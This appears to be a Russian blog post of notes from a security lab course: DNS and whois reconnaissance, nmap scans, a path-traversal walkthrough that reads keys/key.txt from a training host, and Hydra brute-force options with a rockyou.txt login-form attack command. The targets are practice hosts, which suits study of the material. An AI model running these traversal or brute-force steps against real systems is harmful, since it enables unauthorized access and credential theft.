nslookup
Установка
apt-get install nslookup
Узнать IP
nslookup site.ru
Для определения MX-записей введите команду:
nslookup –type=MX site.ru
Определение NS-серверов:
nslookup –type=ns site.ru
Для определения SOA-записи введите команду:
nslookup –type=SOA site.ru
Как изменить интервал ожидания
nslookup –timeout=10 site.ru
Где:
10 ― это количество секунд, за которое должен прийти ответ,
site.ru ― нужное доменное имя.
Dig
dig zonetransfer.me @nsztm2.digi.ninja axfr
whois
whois stepik.org|grep @
Поиск текстовых документов на сайте
site:stepik.org filetype:txt
Сканирование портов
nmap -A demo.seclab.stepic.org
nmap -Pn demo.seclab.stepic.org
snap install zaproxy --classic
https://www.zaproxy.org/docs/docker/
host
host stepik.org
Загрузка страницы
wget -O - https://stepik.org
curl https://stepik.org
Обход 403
0) Мы также знаем, что на сервере лежит ключ по ссылке http://enter.seclab.stepic.org/keys/key.txt
нам важна часть keys/key.txt
1) Переходим http://enter.seclab.stepic.org/getpage.php?page=pluto.tmpl
2) Начинаем ходить по директориям, используя боевые ../ http://enter.seclab.stepic.org/getpage.php?page=../pluto.tmpl
НАС ПРЕДУПРЕЖДАЮТ:
Warning: require_once(go/templates/../pluto.tmpl): failed to open stream: No such file or directory in /opt/www/enter/getpage.php on line 10
Fatal error: require_once(): Failed opening required 'go/templates/../pluto.tmpl' (include_path='.:/usr/share/php:/usr/share/pear') in /opt/www/enter/getpage.php on line 10
3) Изменяем "файл" pluto.tmpl на keys/key.txt
4) Поднимаемся ещё на уровень ../../keys/key.txt
5) Enter the void!
Закодирование текста в строке и декодирование
Base64
Base64 -D
Hydra
hydra -l ЛОГИН|-L ФАЙЛ] -p ПАРОЛЬ-P ФАЙЛ | [-C ФАЙЛ]] [-e nsr] [-o ФАЙЛ] [-t ЗАДАЧИ] [-M ФАЙЛ [-T ЗАДАЧИ]] [-w ВРЕМЯ] [-W ВРЕМЯ] [-f] [-s ПОРТ] [-x МИН:МАКС:НАБОРЫ СИМВОЛОВ] [-SOuvVd46] [service://server[:ПОРТ][/OPT]]
Опции:
-S выполнить SSL соединение
-s ПОРТ если служба не на порту по умолчанию, то можно задать порт здесь
-l ЛОГИН или -L ФАЙЛ с ЛОГИНАМИ (именами), или загрузить несколько логинов из ФАЙЛА
-p ПАРОЛЬ или -P ФАЙЛ с паролями для перебора, или загрузить несколько паролей из ФАЙЛА
-x МИНИМУМ:МАКСИМУМ:НАБОР_СИМВОЛОВ генерация паролей для брутфорса, наберите "-x -h" для помощи
-e nsr "n" — пробовать с пустым паролем, "s" — логин в качестве пароля и/или "r" — реверс учётных данных
-C ФАЙЛ формат где "логин:пароль" разделены двоеточиями, вместо опции -L/-P
-o ФАЙЛ записывать найденные пары логин/пароль в ФАЙЛ вместо стандартного вывода
sudo hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.0.107 -s 8000 http-post-form "/sql/sql_1.php:login_2=^USER#&password_2=^PASS^&post_2=post_2:not found"
Комментариев нет:
Отправить комментарий